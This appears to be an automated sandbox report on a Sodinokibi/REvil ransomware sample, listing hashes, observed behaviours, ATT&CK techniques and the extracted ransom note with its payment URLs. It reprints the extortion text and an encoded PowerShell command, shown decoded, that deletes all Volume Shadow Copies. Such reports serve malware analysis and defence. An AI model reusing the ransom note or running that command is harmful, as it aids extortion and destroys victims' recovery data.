Analysis

  • max time kernel
    149s
  • max time network
    174s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:42

General

  • Target

    82b871a1ab31d0cd7d276e776f459d9b23f256d73b7ada0aada083ab88db0e20.exe

  • Size

    165KB

  • MD5

    af54e287c3671ad0f97e0f42cfcb62b3

  • SHA1

    3c337eee2f02293037a872d4aace36cf5ae00d4f

  • SHA256

    82b871a1ab31d0cd7d276e776f459d9b23f256d73b7ada0aada083ab88db0e20

  • SHA512

    8bd5fd000633ab963ce8b76f10f1aa4eaf1b1136c18a2c4a36454acc37fd2f37ef45c569fe852fb43a1d506308e26b102f90c2528a0c27399c7f2ee1f9e363da

Malware Config

Extracted

Path

C:\How to decrypt d0n36g91-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension d0n36g91. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B6EF5118E001D33A
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.top/B6EF5118E001D33A
Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:
Key: YYa+7/uP+bhfjrR5l5eh3N0RU3ExbpAQck/2KJD5QJwdS6FStuxNyItwPRwGJvvd opK33zWM7M9orKsdVOwusfyzJ8pms9QpV2ZWJP41CuQNg0ifdpK0hqpyFrVLIPkL nRKOfgx94Yf3I2lw2mEF/ySijOB4ht0/IFq4P14WC1NWXQINh+tujdyN+lZwbzrv GkQqMWK+ZGRSDOEfV1YTZGZWwZ6GgDGXdema/0eyVK0GneV5JQ1dwNjBH70gV6fQ hocsMFOucqRknyM/D3hqm9h4VDGCQyczjWOoyJSLN0QV2NHGE+EnfANFMUalmxcc CJl3iQc1i1+CUwl8i8mVo+8QhqCAAqSjKYl/jx92KOZdSAy7/I68n8/aqwqvlbDJ X0IjfUV7orprp5uZrFAC6OvIewyUwfJ6DzZ+oPBtGcmbakiRisrf+F38SKTkc9jK cijvACikaTsICQ73HjorUpkKpfwudKB5bESsSY+SLUpLhxuQDJHEbmU6Obu+iDg9 8ywzjYoJ63a2G1LjdJKgzVq0+/LJG0DwTlUEKodgQ+Xs2sp+ywoDRTpdiHO0HZ/0 F4q8A4xiZ2fBiSQ4Vl5/4KvqabncFEmAZHV3qzQ1ufGz3g5t5Ej8OcjOLWhTUILA S7wJ6oy9Nam5+j6sznR7KGu6GbZ9RVvj6ipEorYpExKdLdj01b8IZa6bBdjphuYW 1AH9vFnj6Z0EyjeLYC5MWS47hkG2i7K4PdnpTJVUmS2vpaHOtYUS12NDb4dEq+nz biGBUTYk11p6yTP9eqOUyvG02KcvTc1SFbf+AP6/jZGt2wZVMgioPwF8MKl8HSIZ IlobXL0T/34swRsb2GoHT8pTgxvS2uhN5Anajrm3YqQMX+OReq9vwk9GpV/ivJ8n wF5Py9xBR7JD+eH6KNAYzi4EsQGdTuu3PJeIoLZ2IKEPvjTVmUqWR8a3cfm4WH/n KUGrlvCchwQxGEHRLKlLNXFMrjBqc85+CBqGMIbJM6dkyFBRW1JRANfhkAes2Px+ ynWU/IzMO6fu/7IRSCCBHAkkgPeafxppfq+KG7ugPeue2FJnEflwBhHJiE0NTUzS X8wZ0yDHGynTlSDKl92AGCkuaXhsCvsPGfoWxgCCXftL6mgZKEsIe2RrYkQ5yqjO d4n2UWP2vp4=
Extension name: d0n36g91

-----------------------------------------------------------------------------------------

!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B6EF5118E001D33A

http://decryptor.top/B6EF5118E001D33A

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 14 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 38 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\82b871a1ab31d0cd7d276e776f459d9b23f256d73b7ada0aada083ab88db0e20.exe
    "C:\Users\Admin\AppData\Local\Temp\82b871a1ab31d0cd7d276e776f459d9b23f256d73b7ada0aada083ab88db0e20.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of all Volume Shadow Copies; this explains the vssvc.exe activity listed below)
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:804
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:380
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
    PID:976

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence: Registry Run Keys / Startup Folder (T1060): 1
  • Defense Evasion: Modify Registry (T1112): 3
  • Defense Evasion: Install Root Certificate (T1130): 1
  • Discovery: Query Registry (T1012): 1
  • Discovery: Peripheral Device Discovery (T1120): 1
  • Discovery: System Information Discovery (T1082): 1
  • Impact: Defacement (T1491): 1


Downloads

  • memory/804-56-0x000007FEFB801000-0x000007FEFB803000-memory.dmp (Filesize 8KB)
  • memory/804-57-0x000007FEF28E0000-0x000007FEF343D000-memory.dmp (Filesize 11.4MB)
  • memory/804-58-0x0000000002780000-0x0000000002782000-memory.dmp (Filesize 8KB)
  • memory/804-59-0x0000000002782000-0x0000000002784000-memory.dmp (Filesize 8KB)
  • memory/804-60-0x0000000002784000-0x0000000002787000-memory.dmp (Filesize 12KB)
  • memory/804-61-0x000000000278B000-0x00000000027AA000-memory.dmp (Filesize 124KB)
  • memory/1732-55-0x0000000074F11000-0x0000000074F13000-memory.dmp (Filesize 8KB)